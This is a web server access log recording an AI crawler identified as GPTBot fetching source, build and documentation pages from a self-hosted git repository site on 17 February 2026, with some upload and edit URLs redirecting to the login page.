"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:15:57:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9990] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:15:57:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11601] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:57:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11600] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:57:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10314] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:57:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2f.venv%2fbin%2fActivate.ps1" [Client 74.7.227.38] [Length 34265] [Gzip 6.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/Activate.ps1" +[17/Feb/2026:15:57:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9968] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:57:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10813] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:57:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:57:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/DOCKER_QUICKSTART.md?display=source" [Client 74.7.227.38] [Length 18129] [Gzip 5.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/DOCKER_QUICKSTART.md" +[17/Feb/2026:15:57:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/DOCKER_QUICKSTART.md?display=rendered" [Client 74.7.227.38] [Length 14318] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/DOCKER_QUICKSTART.md" +[17/Feb/2026:15:57:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/MIGRATION_GUIDE.md?display=rendered" [Client 74.7.227.38] [Length 15811] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/MIGRATION_GUIDE.md" +[17/Feb/2026:15:57:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2f.venv%2fpyvenv.cfg" [Client 74.7.227.38] [Length 23957] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/pyvenv.cfg" +[17/Feb/2026:15:57:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:57:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:57:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9973] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:15:57:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33677] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:15:57:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10811] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:57:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10813] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:57:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:57:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:57:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/MIGRATION_GUIDE.md?display=source" [Client 74.7.227.38] [Length 20912] [Gzip 6.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/MIGRATION_GUIDE.md" +[17/Feb/2026:15:57:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/requirements.txt?display=rendered" [Client 74.7.227.38] [Length 10949] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/requirements.txt" +[17/Feb/2026:15:57:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/updateRecord.md?display=source" [Client 74.7.227.38] [Length 18625] [Gzip 4.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/updateRecord.md" +[17/Feb/2026:15:57:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/updateRecord.md?display=rendered" [Client 74.7.227.38] [Length 16024] [Gzip 2.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/updateRecord.md" +[17/Feb/2026:15:57:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/requirements.txt?display=source" [Client 74.7.227.38] [Length 11436] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/requirements.txt" +[17/Feb/2026:15:57:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup" [Client 74.7.227.38] [Length 11798] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage" +[17/Feb/2026:15:57:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:15:57:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43114] [Gzip 19.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:15:57:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9999] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:15:57:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/projects?q=&sort=alphabetically&state=open" [Client 74.7.227.38] [Length 7803] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/projects" +[17/Feb/2026:15:57:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/services/geminiService.ts?display=rendered" [Client 74.7.227.38] [Length 10912] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/services/geminiService.ts" +[17/Feb/2026:15:57:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include/site/python3.12/greenlet" [Client 74.7.227.38] [Length 9958] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include/site/python3.12/greenlet" +[17/Feb/2026:15:57:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13715] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:57:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13717] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:57:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/.gitignore?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/.gitignore" +[17/Feb/2026:15:57:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 9995] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:15:57:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 12158] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup" +[17/Feb/2026:15:57:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup" +[17/Feb/2026:15:57:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup" +[17/Feb/2026:15:57:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html" [Client 74.7.227.38] [Length 14639] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup" +[17/Feb/2026:15:57:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/.Backup" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup" +[17/Feb/2026:15:57:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/.Backup" +[17/Feb/2026:15:57:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup" +[17/Feb/2026:15:57:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup" +[17/Feb/2026:15:57:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 12707] [Gzip 6.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:15:57:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 10241] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:15:57:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13648] [Gzip 7.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:15:57:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13651] [Gzip 7.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:15:57:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 9965] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:15:57:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] 